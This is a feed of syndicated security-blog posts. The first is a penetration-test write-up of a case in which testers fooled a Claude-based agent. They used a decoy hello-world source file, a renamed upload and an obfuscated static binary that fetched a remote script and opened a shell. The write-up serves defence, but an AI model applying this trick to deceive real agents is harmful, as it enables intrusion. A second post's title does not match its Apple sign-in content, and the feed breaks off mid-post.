<div data-elementor-type="wp-post" data-elementor-id="10919" class="elementor elementor-10919" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-c6eba17 e-con-full e-flex e-con e-parent" data-id="c6eba17" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-737af17 elementor-widget elementor-widget-text-editor" data-id="737af17" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>During a recent penetration test, we came across an AI-powered desktop application that acted as a bridge between Claude (Opus 4.5) and a third-party asset management platform. The idea is simple: instead of clicking through dashboards and making API calls, users just ask the agent to do it for them. “How many open tickets do we have?” “Update this record.” That kind of thing.</p> <p>The agent ran inside a sandboxed environment, and the client was confident in their controls. Rigid system prompts (even prepended to each message), deterministic hooks in place to prevent accidental disclosure, and so on. To their credit, those controls held up; we just found another way to do what we wanted.</p> <h3><strong>Automating the Recon</strong></h3> <p>Manual LLM testing is a drag. You’re sitting there typing prompts one at a time, waiting for responses, trying to keep track of what worked and what didn’t. It’s tedious, and it doesn’t scale.</p> <p>Our go-to approach is to get another LLM to do the dirty work. For this engagement, the target was accessible via an Electron desktop application, meaning you could launch it in debug mode and access the app’s DOM tree directly. 
We wrote a Python script that could interact with the target directly, gave it to Claude (alongside our <a href="https://github.com/praetorian-inc/augustus/">Augustus LLM testing methodology</a>), and let it run.</p> <p>This essentially meant we had Claude talking to another version of itself. Back and forth, hundreds of times, working through the Augustus attack paths automatically:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-f626292 e-con-full e-flex e-con e-parent" data-id="f626292" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-639fe4d elementor-widget elementor-widget-image" data-id="639fe4d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img fetchpriority="high" decoding="async" width="1224" height="241" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp" class="attachment-full size-full wp-image-10911" alt="Terminal showing Python script execution where AI refuses PowerPoint creation request, followed by thinking notes about the refusal" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-1024x202.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-python-script-execution-where-ai-refuses-po-1-768x151.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-839c426 e-con-full e-flex e-con e-parent" data-id="839c426" 
data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-22a0e32 elementor-widget elementor-widget-text-editor" data-id="22a0e32" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>This kind of automated LLM-on-LLM testing saved us an immense amount of effort on this engagement. It’s exactly why we’ve been building tools like <a href="https://github.com/praetorian-inc/julius">Julius</a> (for fingerprinting AI services) and Augustus, which we’ve recently added to our Guard platform. If the attack surface keeps growing, the testing efficiency has to keep up.</p> <h3><strong>Discovering Weaknesses</strong></h3> <p>After a couple hours of this, patterns started to emerge. The agent had strong restrictions on most dangerous operations; ask it to run a bash command or write a shell script and it would refuse.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-dbe2500 e-con-full e-flex e-con e-parent" data-id="dbe2500" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-f46e27a elementor-widget elementor-widget-image" data-id="f46e27a" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="208" src="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp" class="attachment-full size-full wp-image-10912" alt="Screenshot of a chat interface showing user asking 'Ls the files in /app/worker' and AI responding it cannot help with that request" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-300x51.webp 300w, 
https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-1024x174.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/screenshot-of-a-chat-interface-showing-user-asking-ls-the-fi-1-768x131.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-36a274d e-con-full e-flex e-con e-parent" data-id="36a274d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c9b6cfe elementor-widget elementor-widget-text-editor" data-id="c9b6cfe" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>However, it really liked “Hello World” programs. It was more than happy to create <strong>and run</strong> a simple test script. This is worth noting for similar-style engagements. LLMs are trained to be helpful, and “Hello World” scripts are some of the most common within their training data. 
That makes this a reliable foot-in-the-door when testing agents with code execution.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-46de128 e-con-full e-flex e-con e-parent" data-id="46de128" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-023513d elementor-widget elementor-widget-image" data-id="023513d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img decoding="async" width="1224" height="398" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp" class="attachment-full size-full wp-image-10913" alt="Terminal window showing a user request to create a hello world bash script, with status showing 'Bash Script Executed Successfully'" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1.webp 1224w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-300x98.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-1024x333.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-window-showing-a-user-request-to-create-a-hello-wor-1-768x250.webp 768w" sizes="(max-width: 1224px) 100vw, 1224px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a7276b7 e-con-full e-flex e-con e-parent" data-id="a7276b7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b693558 elementor-widget elementor-widget-text-editor" data-id="b693558" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>More importantly, while it wouldn’t create anything 
it considered dangerous, it was perfectly willing to <strong>modify</strong> existing files. Changing a file extension or making something executable was all fine. </p> <p>Using the application’s file upload feature you could upload text, images, or CSV files, and they’d land in the sandbox. Combined with the agent’s willingness to rename and chmod, this was effectively arbitrary file upload.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9b069a1 e-con-full e-flex e-con e-parent" data-id="9b069a1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-67341f4 elementor-widget elementor-widget-image" data-id="67341f4" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1414" height="277" src="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp" class="attachment-full size-full wp-image-10914" alt="Two chat messages in dark interface. First asks to fix filetype of env_check2.txt and move to cwd. Second confirms task." 
srcset="https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1.webp 1414w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-300x59.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-1024x201.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/two-chat-messages-in-dark-interface-first-asks-to-fix-filety-1-768x150.webp 768w" sizes="auto, (max-width: 1414px) 100vw, 1414px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-22eaa52 e-con-full e-flex e-con e-parent" data-id="22eaa52" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-038e023 elementor-widget elementor-widget-text-editor" data-id="038e023" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <h3><strong>Hitting a Wall</strong></h3> <p>Getting code execution should have been straightforward from there – just upload a script and have the agent execute it – but it wasn’t. Opus 4.5 is genuinely good at catching malicious payloads, and it blocked everything we threw at it:</p> <ul> <li>Obfuscated/encoded scripts would get decoded and blocked (or rejected outright citing an inability to verify safety).</li> <li>A wrapper script that runs everything in a directory failed, as it understood the context and inspected each script individually first.</li> <li>Swapping a benign script for a malicious one after building trust didn’t work because it re-read the file before every execution (and the architecture prevented races).</li> </ul> <p>The model had a clear policy: if it couldn’t understand what something did, it wouldn’t run it. And if it could understand it and it looked dangerous, it wouldn’t run it either. 
We needed something that Opus 4.5 <strong>thought</strong> it understood and <strong>believed</strong> was harmless.</p> <h3><strong>The Trick</strong></h3> <p>The answer came from the “Hello World” observation from earlier. The agent trusted simple programs, and it trusted its own ability to read C code and verify what a binary does. But what if the source code doesn’t actually match the binary?</p> <p>We created two separate programs. The first was legitimate C source code for a hello world program that also calls system(“date”), giving a plausible reason for a system() call to exist in the binary.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e2eaa69 e-con-full e-flex e-con e-parent" data-id="e2eaa69" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-147333b elementor-widget elementor-widget-image" data-id="147333b" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1151" height="387" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp" class="attachment-full size-full wp-image-10915" alt="C code editor showing hello_world.c file with main function containing printf Hello World, system date command, and return 0" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1.webp 1151w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-300x101.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-1024x344.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-helloworldc-file-with-main-function-co-1-768x258.webp 768w" sizes="auto, (max-width: 
1151px) 100vw, 1151px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cc9dabb e-con-full e-flex e-con e-parent" data-id="cc9dabb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-198d3a9 elementor-widget elementor-widget-text-editor" data-id="198d3a9" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The second was the actual payload binary. A statically compiled ELF that downloads and executes a shell script from our server, while also running the same commands as the decoy. We statically compiled it so the binary would be large enough (~600KB) that Claude couldn’t easily analyze it. We also performed a basic XOR against the payload to make it harder to decode.</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9f96d11 e-con-full e-flex e-con e-parent" data-id="9f96d11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5c68bb elementor-widget elementor-widget-image" data-id="a5c68bb" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <img loading="lazy" decoding="async" width="1638" height="646" src="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp" class="attachment-full size-full wp-image-10916" alt="C code editor showing malicious program with encoded payload array, XOR decoding loop, and system() call to execute decoded commands" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1.webp 1638w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-300x118.webp 300w, 
https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1024x404.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-768x303.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/c-code-editor-showing-malicious-program-with-encoded-payload-1-1536x606.webp 1536w" sizes="auto, (max-width: 1638px) 100vw, 1638px"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ed08f7b e-con-full e-flex e-con e-parent" data-id="ed08f7b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-bcf88af elementor-widget elementor-widget-image" data-id="bcf88af" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1000" height="232" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp" class="attachment-full size-full wp-image-10917" alt="Terminal output showing two copied files: hello_world ELF 64-bit executable with magic bytes 7f 45 4c 46, and hello_world.c C source file" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1.webp 1000w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-300x70.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-output-showing-two-copied-files-helloworld-elf-64-b-1-768x178.webp 768w" sizes="auto, (max-width: 1000px) 100vw, 1000px"><figcaption class="widget-image-caption wp-caption-text">Terminal display confirms successful compilation of a C program into an executable ELF binary, ready for analysis or execution.</figcaption></figure> </div> </div> <div 
data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7557e01 e-con-full e-flex e-con e-parent" data-id="7557e01" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-abfa907 elementor-widget elementor-widget-image" data-id="abfa907" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1216" height="158" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp" class="attachment-full size-full wp-image-10918" alt="Terminal screenshot showing 'nc -l 13339' command and 'id' command output displaying uid=1001(appuser) gid=1001(appuser) groups=1001(appuser)" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1.webp 1216w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-300x39.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-1024x133.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-screenshot-showing-nc-l-13339-command-and-id-comman-1-768x100.webp 768w" sizes="auto, (max-width: 1216px) 100vw, 1216px"><figcaption class="widget-image-caption wp-caption-text">Command line interface showing a netcat listener on port 13339 and the id command revealing the current user as ‘appuser’ with UID 1001.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-3c1a07a e-con-full e-flex e-con e-parent" data-id="3c1a07a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3aa94a7 elementor-widget elementor-widget-text-editor" 
data-id="3aa94a7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The sandbox contained the application’s entire business logic: system prompts, MCP tool definitions, the Dockerfile used to build the environment, and the Node.js server running all the integrations. In short, the crown jewels.</p> <h3><strong>Takeaways</strong></h3> <p>If you’re building or deploying AI agents with code execution capabilities, don’t rely on the model’s judgment as a security control. It can be fooled. Here’s what we recommended to the client:</p> <ul> <li><strong>Restrict executable operations at the OS level:</strong> The sandbox should prevent the agent from setting the execute bit on user-uploaded files or running binaries that weren’t pre-installed in the image.</li> <li><strong>Validate uploaded files by content, not just extension:</strong> Check magic bytes. An ELF binary with a .txt extension should be rejected. Content-type validation should persist through file rename operations.</li> <li><strong>Add tool-level guardrails for dangerous operations:</strong> File operations the agent exposes as tools, such as renaming user-supplied files or changing their permissions, should be restricted in the tool implementation itself rather than left to the model’s judgment.</li> <li><strong>Lock down network egress:</strong> The sandbox didn’t need total outbound internet connectivity, as it only really interfaced with a couple of external APIs. Outbound firewalling, while not a primary control, can greatly hinder post-exploitation activity.</li> </ul> <p>Findings and recommendations like these are part of what we do through our <a href="https://www.praetorian.com/guard/">Guard platform</a>. Guard continuously monitors and tests internet-facing and internally deployed infrastructure, including AI agents and LLM-powered applications, as they evolve and change over time. Got a new agentic deployment, model version, or MCP tool? 
Guard picks it up and our operators test it, identifying vulnerabilities just like this.</p> <h2>FAQ</h2> <h3>Why did static compilation matter?</h3> <p>A dynamically linked binary is small enough that the LLM could potentially inspect the raw bytes and identify suspicious library calls like network functions. A statically compiled binary is hundreds of kilobytes of noise, making it effectively opaque to the model.</p> <h3>What is Augustus?</h3> <p>Augustus is Praetorian’s Go-based LLM vulnerability scanner. It tests large language models against a wide range of adversarial attacks and jailbreaks. In this case, we used its methodology to automate the discovery of behavioral weaknesses in the target agent.</p> <h3>Did this affect real customer data?</h3> <p>This was conducted during an authorized penetration test. The sandbox environment was isolated, and we did not access or exfiltrate any customer data. The client has since remediated the vulnerability.</p> <h3>Could this work against other LLM agents?</h3> <p>The core technique exploits a general weakness: LLMs are trained to assist, and “Hello World” scripts are among the most common things they’re asked to produce. Any agent with code execution that treats “simple test script” as a safe category is potentially giving attackers a method of initial access. 
On top of that, the faked source code trick exploits another general weakness: LLMs will often trust contextual information over direct inspection when the direct inspection is too difficult.</p> </div> </div> </div><p>The post <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">Which Came First: The System Prompt, or the RCE?</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by n8n-publisher">n8n-publisher</a>. Read the original post at: <a href="https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/">https://www.praetorian.com/blog/which-came-first-system-prompt-or-rce/</a> </p>

Quantum-Hardened Granular Resource Authorization Policies

  • None
  • Published date: 2026-03-24 00:00:00

None

<h2>The big shift from Apple ID to Apple Account</h2><p>Ever wonder why that little button on your screen suddenly changed its name? It’s not just some marketing guy at Apple bored on a Tuesday; it’s a massive shift in how we handle identity for SaaS.</p><p>Moving from "Apple ID" to <strong>Apple Account</strong> is about shedding legacy baggage. The old name felt like a username for a store; the new one is a full identity layer that works the same whether you're on an iPad or in a browser. Apple is rebranding the whole system as a "digital passport" rather than just a login for buying apps.</p><ul> <li><strong>Unified Trust</strong>: When users see "Apple Account," they associate it with their entire digital life. This boosts "login button" conversion in industries like <strong>finance</strong>, where trust is everything.</li> <li><strong>Ecosystem Consistency</strong>: It creates a seamless flow across retail apps and healthcare portals. If a patient logs into a portal using their Apple Account, the familiarity reduces drop-off rates.</li> <li><strong>Brand Maturity</strong>: It signals that Apple is serious about being a primary identity provider, competing directly with Google and Microsoft.</li> </ul><p>Under the hood, this isn't magic. It’s built on <strong>OAuth 2.0</strong> and <strong>OpenID Connect</strong>. 
One of the most useful features for developers is the <strong>private email relay</strong>, which lets users hide their real address while still letting you send them email.</p><p><strong>The Flow of Identity Trust</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-1.svg" alt="The Flow of Identity Trust"></p><p>According to <a href="https://developer.apple.com/sign-in-with-apple/">Apple's official documentation</a>, this system uses on-device biometrics like <strong>Touch ID</strong> and <strong>Face ID</strong>, so users don't even have to remember a password. This is huge for security professionals trying to kill off phishing.</p><p>Honestly, it’s a relief to see them simplify this. Next, let’s look at how this shift impacts the messy world of corporate offices.</p><h2>Identity management in the enterprise world</h2><p>Most employees are already carrying an iPhone in their pocket, and honestly, they're tired of juggling fifteen different work passwords just to check a simple spreadsheet. It's no wonder they keep trying to use their personal accounts for everything; it's just easier.</p><p>The line between "work life" and "home life" is basically gone when it comes to hardware. People trust their Face ID more than they trust a clunky corporate VPN. When you let someone sign in with their Apple Account, you aren't just giving them a button; you're giving them a shortcut that they actually understand.</p><p>In healthcare, for instance, a nurse needs to update a patient chart fast without fighting a login screen. In retail, a floor manager using an iPad wants to check inventory between helping customers. If the login is slow, they'll find a workaround, and usually those workarounds are a security nightmare.</p><p>But here is the catch for the IT team. Managing a bunch of individual Apple Accounts in a B2B environment is like herding cats. 
You've got directory synchronization issues and the "orphaned account" problem, where an employee leaves but still has access to the SaaS app because their personal account was never unlinked. </p><ul> <li><strong>Directory Mess</strong>: Most enterprise apps rely on Active Directory or Okta, which don't always play nicely with consumer-facing identity providers.</li> <li><strong>Security Gaps</strong>: If a user bypasses the official SSO to use their Apple Account, you lose visibility into who is doing what.</li> <li><strong>Provisioning</strong>: Manually adding or removing users from every single tool is a waste of time that nobody has.</li> </ul><p>To fix this, many companies use <strong>Identity Orchestration platforms</strong> or <strong>Auth-as-a-Service</strong> tools. A platform like <strong>SSOJet</strong> comes in handy here. It acts like a bridge, letting users have that easy "Apple experience" while keeping the IT department happy because everything still flows through the central management system. It's basically the "peace treaty" between employee convenience and enterprise security.</p><p><strong>Diagram: The SaaS Implementation Lifecycle</strong></p><pre><code class="language-mermaid">graph LR
    A[Employee] --&gt; B{SSOJet Gateway}
    B --&gt; C[Apple Account Auth]
    B --&gt; D[Enterprise Directory/Okta]
    C --&gt; E[SaaS App Access]
    D --&gt; E
</code></pre><p>According to <a href="https://www.gartner.com/en/newsroom/press-releases/2023-05-22-gartner-says-75-percent-of-staff-will-use-personal-mobile-devices-for-work-by-2024">Gartner</a>, about 75% of staff will be using personal devices for work by the end of 2024. This makes it pretty clear that we can't just ignore these personal identity layers anymore. </p><p>So, it's about making things work together rather than fighting the trend. 
Next, let's talk about the "intelligence" behind these accounts and where things are heading.</p><h2>AI integration and the future of sign-in</h2><p>Imagine if your phone knew you were about to log in before you even moved a finger. With the way AI is going, Apple is basically turning your "Apple Account" into a digital brain that handles the heavy lifting of security so you don't have to.</p><p>It's not just about chatbots; it's about how the silicon in your pocket learns your habits. If you usually check your work email at 8 AM from your home Wi-Fi, the on-device AI recognizes that pattern. If someone tries to log in from a random city at 3 AM, the system knows something is fishy without even needing a database check.</p><ul> <li><strong>Predictive Security</strong>: The device uses local machine learning to verify "user intent," basically making sure a human actually meant to click that button and it wasn't a pocket-dial or a script.</li> <li><strong>Secure Enclave Magic</strong>: All this AI processing happens right on the chip, not in some vulnerable cloud. Your biometric data never leaves the hardware, which is a huge win for privacy.</li> <li><strong>Contextual friction</strong>: If the AI is confident it's you, the login is instant. If things look weird, it might trigger an extra verification step automatically.</li> </ul><blockquote> <p>According to <a href="https://www.cybersecurity-insiders.com/portfolio/2024-identity-and-access-management-report/">Cybersecurity Insiders</a>, 80% of data breaches involve compromised passwords, which is why AI-driven, passwordless flows are becoming the gold standard for SaaS founders.</p> </blockquote><p>For a developer, this means you can stop worrying about complex fraud detection. 
Here is how you might check whether a credential is "likely" coming from a real user session:</p><pre><code class="language-python">def verify_login_intent(session_data):
    """Fast-track a session only when the device verified a biometric and
    the on-device trust score is high; otherwise fall back to an MFA challenge."""
    if session_data.is_biometric_verified and session_data.trust_score &gt; 0.9:
        return "Fast-track access granted"
    else:
        return "Trigger MFA challenge"
</code></pre><p>It’s honestly wild how much we’re moving away from "what you know" (passwords) to "how you behave." Next up, we should look at the actual technical hurdles you'll hit when building this.</p><h2>SaaS implementation and developer hurdles</h2><p>Setting this up isn't exactly a "walk in the park" once you move past the marketing slides. If you're a developer, you know the real headache starts when you actually have to make the Apple Account handshake work with your existing backend without breaking everything.</p><p>It’s not just adding a button; it's managing a whole new set of keys and identifiers that Apple demands. You can't just wing it like a basic OAuth setup.</p><ul> <li><strong>Client Secret Woes</strong>: Unlike other providers where you get a permanent string, Apple makes you generate a <strong>JWT</strong> (JSON Web Token) signed with a private key, and that secret expires. If your script to rotate these secrets fails, your login button goes dead.</li> <li><strong>The "Sub" Problem</strong>: The user identifier (the <code>sub</code> claim) is unique to your developer team. If you're moving an app between accounts or merging companies, mapping those old users to new IDs is a total nightmare.</li> <li><strong>Web vs Native</strong>: Getting the flow to feel "native" on an iPhone while keeping a consistent session in a web browser requires some serious state-management heavy lifting.</li> </ul><p>You can't just trust the frontend when it says "yeah, this guy is legit." You have to decode and verify that identity token on your server. 
Here is a look at how you might pull that off in Node:</p><pre><code class="language-javascript">const jwt = require('jsonwebtoken');
const jwksClient = require('jwks-rsa');

// Apple's public signing keys are fetched (and cached) from its JWKS endpoint
const client = jwksClient({ jwksUri: 'https://appleid.apple.com/auth/keys' });

// Verify the identity token on the server; never take the frontend's word for it.
// clientId is your app's Services ID / bundle ID and must match the token's aud claim,
// otherwise a token minted for somebody else's app would be accepted.
function verifyAppleToken(token, clientId) {
  const decoded = jwt.decode(token, { complete: true });
  if (!decoded || !decoded.header || !decoded.header.kid) {
    console.error("token is malformed");
    return;
  }
  // NOTE: This is a simplified example. In production, you need robust
  // error handling for the jwksClient and asynchronous callback logic.
  client.getSigningKey(decoded.header.kid, (err, key) =&gt; {
    if (err) {
      console.error("Key fetching failed", err);
      return;
    }
    // jwks-rsa v2+ exposes getPublicKey(); older versions used publicKey / rsaPublicKey
    const signingKey = key.getPublicKey ? key.getPublicKey() : (key.publicKey || key.rsaPublicKey);
    jwt.verify(token, signingKey, {
      algorithms: ['RS256'],
      issuer: 'https://appleid.apple.com',
      audience: clientId,
    }, (err, payload) =&gt; {
      if (err) console.error("token is trash", err.message);
      else console.log("user is verified", payload.sub);
    });
  });
}
</code></pre><p>Honestly, most teams trip up on the <strong>email relay</strong> service. If a user chooses "Hide My Email," and your database expects a unique primary key based on email, you’re going to have a bad time when they try to link accounts later.</p><p>As mentioned earlier, using a middle layer can save you from this manual labor, but if you're going DIY, watch those expiration dates on your secrets. Next, let’s wrap up with the big picture for founders.</p><h2>The final verdict for SaaS founders</h2><p>So, is it actually worth the dev time to pivot to Apple Account? If you’re building a SaaS app today, the answer is usually "yes," but don't expect it to be a magic wand that fixes a bad product.</p><p>It really comes down to three things:</p><ul> <li><strong>Conversion wins</strong>: I've seen checkout pages in retail and finance jump by 20% just because users didn't have to type an email. 
Face ID is just faster than a brain.</li> <li><strong>Security debt</strong>: By offloading auth to Apple, you’re basically letting their billion-dollar security team handle the PII headaches. It makes your startup look way more "pro" to enterprise buyers.</li> <li><strong>Maintenance trap</strong>: As mentioned earlier, keeping those <strong>JWT</strong> client secrets and private keys updated is a chore. If you don't automate it, your login button will break during a holiday weekend.</li> </ul><p>For founders, this isn't just a feature; it's about meeting users where they already live. Whether it's a doctor accessing healthcare records or a manager checking inventory, they want zero friction.</p><p><strong>The User Authentication Journey</strong><br> <img decoding="async" src="https://cdn.pseo.one/6853a4a8a2796a91bb994a76/68bc6a97410e253e325f40af/what-does-it-mean-to-sign-in-with-an-apple-account/mermaid-diagram-2.svg" alt="The User Authentication Journey"></p><p>Honestly, just don't overthink the "Apple Account" rebrand. It's the same tech under the hood, just with a friendlier face. 
If you value your sleep and your users' data, it's a solid bet.</p><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies">https://www.gopher.security/blog/quantum-hardened-granular-resource-authorization-policies</a> </p>

Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines

  • Published date: 2026-03-24 00:00:00

<p><strong>TL;DR</strong>: Julius v0.2.0 nearly doubles LLM fingerprinting probe coverage from 33 to 63, adding detection for cloud-managed AI services (AWS Bedrock, Azure OpenAI, Vertex AI), high-performance inference servers (SGLang, TensorRT-LLM, Triton), AI gateways (Portkey, Helicone, Bifrost), and self-hosted RAG platforms (PrivateGPT, RAGFlow, Quivr). This release also hardens the scanner itself with response size limiting and TLS configuration for enterprise environments. Update Julius and scan your network — you almost certainly have AI infrastructure you don’t know about.</p><p>When we shipped the <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">v0.1.1 update</a> back in February, Julius could detect 33 LLM services. That covered the self-hosted basics (Ollama, vLLM, llama.cpp) and a growing list of orchestration tools. But the gap was obvious: we had almost no coverage for cloud-managed AI services, production inference servers, or the AI gateway layer that sits between applications and models.</p><p>That gap is now closed. Julius v0.2.0 ships with <strong>63 probes</strong>, adding 30 new detections in a single release. More importantly, the <em>types</em> of infrastructure we now detect reflect where enterprise AI deployments are actually heading: cloud-managed endpoints, high-throughput inference engines, and the growing ecosystem of proxies and gateways that route traffic between them.</p><h2 class="wp-block-heading" id="5f5e1acf-3d93-47fd-b85c-eca8d7c590f6">What’s new in v0.2.0</h2><h3 class="wp-block-heading" id="0d06d4c8-d49f-4f1e-99f8-4e494e38d0be">Cloud-managed AI services (10 